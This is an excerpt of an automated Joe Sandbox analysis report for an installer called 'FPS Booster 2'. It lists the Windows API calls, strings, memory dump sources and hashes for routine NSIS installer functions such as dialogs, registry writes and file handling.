                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                • API String ID: 20674999-2124804629
                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                • GetSysColor.USER32(?), ref: 004041DB
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                • SetCursor.USER32(00000000), ref: 00404322
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                • String ID: F$N$open
                                                • API String ID: 3928313111-1104729357
                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB1126
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB112D
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB1135
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB113D
                                                  • Part of subcall function 6FFB1E34: lstrcpynW.KERNEL32(?,?,6FFB1053,?,6FFB1053,?), ref: 6FFB1E62
                                                  • Part of subcall function 6FFB1E34: GlobalFree.KERNELBASE ref: 6FFB1E72
                                                • lstrcmpiW.KERNEL32(?,save,?,00000400,00000000,00000400,?,00000400), ref: 6FFB11A0
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 6FFB11AC
                                                • lstrcpyW.KERNEL32(?,00000000), ref: 6FFB11BF
                                                • lstrcpyW.KERNEL32(?,All Files|*.*), ref: 6FFB11DC
                                                • CharNextW.USER32(?), ref: 6FFB11FB
                                                • GetCurrentDirectoryW.KERNEL32(00000004,?), ref: 6FFB1212
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 6FFB1220
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 6FFB1228
                                                • CommDlgExtendedError.COMDLG32 ref: 6FFB1235
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 6FFB124F
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 6FFB1257
                                                • SetCurrentDirectoryW.KERNEL32(?,6FFB30FC), ref: 6FFB126E
                                                • GlobalFree.KERNEL32(00000000), ref: 6FFB127B
                                                • GlobalFree.KERNEL32(?), ref: 6FFB127E
                                                • GlobalFree.KERNEL32(?), ref: 6FFB1283
                                                • GlobalFree.KERNEL32(?), ref: 6FFB1288
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$FileFree$AllocName$CurrentDirectoryOpenSavelstrcpy$AttributesCharCommErrorExtendedNextlstrcmpilstrcpyn
                                                • String ID: All Files|*.*$X$save
                                                • API String ID: 406688562-3147001704
                                                • Opcode ID: e92eea4bdcb840ce3a993b909062850bba8d6bd9f3578f395f098773941533ec
                                                • Instruction ID: 63c0449c1377bf51c13489ae6c84196cb582b0130166992f84d6da13fb507e9f
                                                • Opcode Fuzzy Hash: e92eea4bdcb840ce3a993b909062850bba8d6bd9f3578f395f098773941533ec
                                                • Instruction Fuzzy Hash: ED416A71D50618EBCF10AFB6CC8AB9E7FB8EF067A5F10401AE505E7290D774A950CBA0
                                                APIs
                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                • wsprintfA.USER32 ref: 00406B79
                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$ByteCharCloseGlobalHandleMulusermePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                • API String ID: 565278875-3368763019
                                                • Opcode ID: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                • Opcode Fuzzy Hash: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                • EndPaint.USER32(?,?), ref: 00401177
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                APIs
                                                • SendMessageW.USER32(?,?,?), ref: 6FFB1558
                                                • GetDlgItem.USER32(?,?), ref: 6FFB156B
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 6FFB1693
                                                • DrawTextW.USER32(?,?,000000FF,?,00000414), ref: 6FFB16B4
                                                • GetWindowLongW.USER32(?,000000EB), ref: 6FFB16FF
                                                • SetTextColor.GDI32(?,00FF0000), ref: 6FFB1711
                                                • DrawTextW.USER32(?,?,000000FF,00000000,?), ref: 6FFB172B
                                                • DrawFocusRect.USER32(?,00000010), ref: 6FFB174C
                                                • RemovePropW.USER32(00000000,NSIS: nsControl pointer property), ref: 6FFB1770
                                                Strings
                                                • NSIS: nsControl pointer property, xrefs: 6FFB1768
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Text$Draw$Window$ColorFocusItemLongMessagePropRectRemoveSend
                                                • String ID: NSIS: nsControl pointer property
                                                • API String ID: 2331901045-1714965683
                                                • Opcode ID: 018ee019fbdae9bc7fa1d426565270d5fddf603659528e9043f031266639bac2
                                                • Instruction ID: 6a6dae0966c6c93ebabd9e399e0e5e2e188b22a33a755542c90030726c8f56c0
                                                • Opcode Fuzzy Hash: 018ee019fbdae9bc7fa1d426565270d5fddf603659528e9043f031266639bac2
                                                • Instruction Fuzzy Hash: F771DF715042099BDF11DF26CD84BAA7BF9FF02354F10456EE821DB2A6E730E891CB90
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                • API String ID: 1641139501-220328614
                                                • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                APIs
                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                • lstrcatW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                • lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),?,?,00406300,00000000), ref: 004061CE
                                                • WriteFile.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                • String ID: @bG$File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1)
                                                • API String ID: 3734993849-846574163
                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                APIs
                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,6E9E2B4A,00000000), ref: 6E9E2499
                                                  • Part of subcall function 6E9E164F: lstrcpyW.KERNEL32(00000018,00000000,?,6E9E11CD,-0000002E,00000000), ref: 6E9E1674
                                                • wsprintfW.USER32 ref: 6E9E24E8
                                                • GlobalFree.KERNEL32(?), ref: 6E9E2516
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E253F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                • String ID: s<u
                                                • API String ID: 2435812281-779365171
                                                • Opcode ID: 2e8a9ebe229e9229e68d1d1ab1f35798dee3ef19f392d955b9e29f8085b23587
                                                • Instruction ID: 802ebaedd80d66d62a822bb9544ca37b1816b5a1bd501b74595cb882eb8f827b
                                                • Opcode Fuzzy Hash: 2e8a9ebe229e9229e68d1d1ab1f35798dee3ef19f392d955b9e29f8085b23587
                                                • Instruction Fuzzy Hash: 9931AEB1208607EFEB229BB8CD5886AB7BCFF463567110914EB1197A95FB31D844DF20
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                Strings
                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID: created uninstaller: %d, "%s"
                                                • API String ID: 3294113728-3145124454
                                                • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                • GetSysColor.USER32(?), ref: 00403E57
                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                APIs
                                                • lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                • lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
